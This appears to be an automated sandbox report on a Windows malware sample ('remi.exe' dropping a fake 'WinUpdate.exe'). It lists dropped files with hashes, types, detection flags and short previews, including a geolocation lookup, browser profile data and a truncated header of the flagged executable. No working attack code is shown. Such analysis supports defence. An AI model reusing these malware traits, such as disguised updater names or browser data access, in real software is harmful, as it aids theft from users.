                                                                                                                                                                                                                                                                                              Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2232
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.380192968514367
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyut:+LHyIFKL3IZ2KRH9Ougbt
                                                                                                                                                                                                                                                                                              MD5:C657E915C0C6AC7481428E39A49DE711
                                                                                                                                                                                                                                                                                              SHA1:2ABEEE53290BF4FC93E3F8A3C959C744BD05A6D7
                                                                                                                                                                                                                                                                                              SHA-256:AE3485E51572AEC5A2F5F54B07D06C0763FEBF0661531FC160A8D29385F1187E
                                                                                                                                                                                                                                                                                              SHA-512:6F01A65D81066760F7A9F7954E71AFA7FCB1AEFA13385FD1DAA5156D677000FC50AEF0505FA24BE0B36219CCD44164EAEA16EE05954A221BE668A48BAFF56EF8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.04638100721410993
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:12c0jLYiVWK+wBhF4y5hJTpRlakC2GXnSgIbEhVDNEVuIjVg1RQcGvlDX2n8y08s:cc0jjlLp38thlegrAlDG08T2RGOD
                                                                                                                                                                                                                                                                                              MD5:B09962496E62504A0BB051278E973C8B
                                                                                                                                                                                                                                                                                              SHA1:D7B8A6B7D4B85BABDB4DBE8ACFDD770B2D293FE9
                                                                                                                                                                                                                                                                                              SHA-256:5C4FC4E2F3320F59D0FC99F3D9A89FAB73951412C01C4B2F2DA0C2D602E3995B
                                                                                                                                                                                                                                                                                              SHA-512:1E51D62A4EA4FE2546276A8B131D1CE7FA21F63D2134CED644FE0C0DBF3EA21809B50B11853F043DC5B83B0DE5EB46EE53BB10435A907EC35B63CB74F8825169
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...@..@...@.....C.].....@...............pf..(V..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".rnwjci20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U..G...W6.....>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2......._...... .2........
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.6219280948873624
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:8g6Vvn:8g6Vv
                                                                                                                                                                                                                                                                                              MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                                                                                                                                                                                                                                              SHA1:E68E02453CE22736169A56FDB59043D33668368F
                                                                                                                                                                                                                                                                                              SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                                                                                                                                                                                                                                              SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:level=none expiry=0.
                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):30076
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.567669414159009
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:jf8BBgLoL6+vWPm0f4W8F1+UoAYDCx9Tuqh0VfUC9xbog/OVQmdXt4erw777:jf8BBOW6+vWPm0f4Wu1japmd94737
                                                                                                                                                                                                                                                                                              MD5:66E477495E30EE8AA013A8F513A77257
                                                                                                                                                                                                                                                                                              SHA1:605947E12458EDA239019A777A3FCB27D0C25978
                                                                                                                                                                                                                                                                                              SHA-256:7E688E6732F4E21CE5BA7B7F8518CA8D5D5C0D37559AC1F799E1DAC2973C2744
                                                                                                                                                                                                                                                                                              SHA-512:2CD827C48405F9A9B213819DA5FAF93FB43E5B54454CC5B811A706B40CB2D6E4F0658BCB9EA0C87A65013332ECB829C17B590DB9F8C896BFBDAE61706CF8F626
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13340960281132625","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13340960281132625","location":5,"ma
                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44455
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.089741747455916
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPl4kzZ7okEt9r1JDSgzMMd6qD47u3+Ciol:+/Ps+wsI7ynOSkzItSmd6qE7lFol
                                                                                                                                                                                                                                                                                              MD5:984EB5B329CECFDD591DAFAC9780511F
                                                                                                                                                                                                                                                                                              SHA1:4D3AC368DFE387AE387828A0D330FD7F7B170501
                                                                                                                                                                                                                                                                                              SHA-256:490BC57549419F27F8E720B0C23E9D7DAD7E5A9C9FC23857293A42126668FA72
                                                                                                                                                                                                                                                                                              SHA-512:3361E0B7EED937BDE6F4462AB688B7B08CE2A1A26D05DBD20D912F303D6271C352AD1DEE09C37FBE35AA144AD5527700CFE0538AC1BDFF570EAE523F7E79C77D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44455
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.089741747455916
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPl4kzZ7okEt9r1JDSgzMMd6qD47u3+Ciol:+/Ps+wsI7ynOSkzItSmd6qE7lFol
                                                                                                                                                                                                                                                                                              MD5:984EB5B329CECFDD591DAFAC9780511F
                                                                                                                                                                                                                                                                                              SHA1:4D3AC368DFE387AE387828A0D330FD7F7B170501
                                                                                                                                                                                                                                                                                              SHA-256:490BC57549419F27F8E720B0C23E9D7DAD7E5A9C9FC23857293A42126668FA72
                                                                                                                                                                                                                                                                                              SHA-512:3361E0B7EED937BDE6F4462AB688B7B08CE2A1A26D05DBD20D912F303D6271C352AD1DEE09C37FBE35AA144AD5527700CFE0538AC1BDFF570EAE523F7E79C77D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44455
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.089741747455916
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPl4kzZ7okEt9r1JDSgzMMd6qD47u3+Ciol:+/Ps+wsI7ynOSkzItSmd6qE7lFol
                                                                                                                                                                                                                                                                                              MD5:984EB5B329CECFDD591DAFAC9780511F
                                                                                                                                                                                                                                                                                              SHA1:4D3AC368DFE387AE387828A0D330FD7F7B170501
                                                                                                                                                                                                                                                                                              SHA-256:490BC57549419F27F8E720B0C23E9D7DAD7E5A9C9FC23857293A42126668FA72
                                                                                                                                                                                                                                                                                              SHA-512:3361E0B7EED937BDE6F4462AB688B7B08CE2A1A26D05DBD20D912F303D6271C352AD1DEE09C37FBE35AA144AD5527700CFE0538AC1BDFF570EAE523F7E79C77D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\remi.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):982016
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.954492423343905
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:YQm35eXO2xQ7nEP9FsGu0ftQbg665Xp3GuD+XjK:jej2ynElFsGu0fsgD5XpTqXj
                                                                                                                                                                                                                                                                                              MD5:B074E2458B987EFEC69536A58316D5A6
                                                                                                                                                                                                                                                                                              SHA1:FFEBEFA18462D47FC8B82ABC9069C9FDD6079DA9
                                                                                                                                                                                                                                                                                              SHA-256:E744E0AA890A2D9B5E6EED8403CB16F6098BAEE4A0529B1FABC0644EE4BA6B32
                                                                                                                                                                                                                                                                                              SHA-512:1F76D7AE0558962781B913B765FF6B92B5F03AA511C6BE2F206FF17C361052D4B34A37D46E49447A0860586474C3BC656ED34D9D094B605D06A6EBFBCC0A2422
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ... ....@.. .......................`............@.....................................O.... ..(....................@......X...p............................................ ............... ..H............text........ ...................... ..`.rsrc...(.... ......................@..@.reloc.......@......................@..B........................H...........l...........................................................0..L.........}.....(.......(......(............s......( ....o!.....("....o#.....($....*.0............}........(%........(&.....,5...(............s......(.....o!.....(.....o#....85....r...p.V...('...o(...tV.......()..........9.....s.........s*...s+...o,......o ...r...po-..........,$..( .....o ...r...po-...s....o.........o/...(0.......o1...(2.......o3...(4.......o5...(6.......o7...(8.......o9...(:.........
                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\remi.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
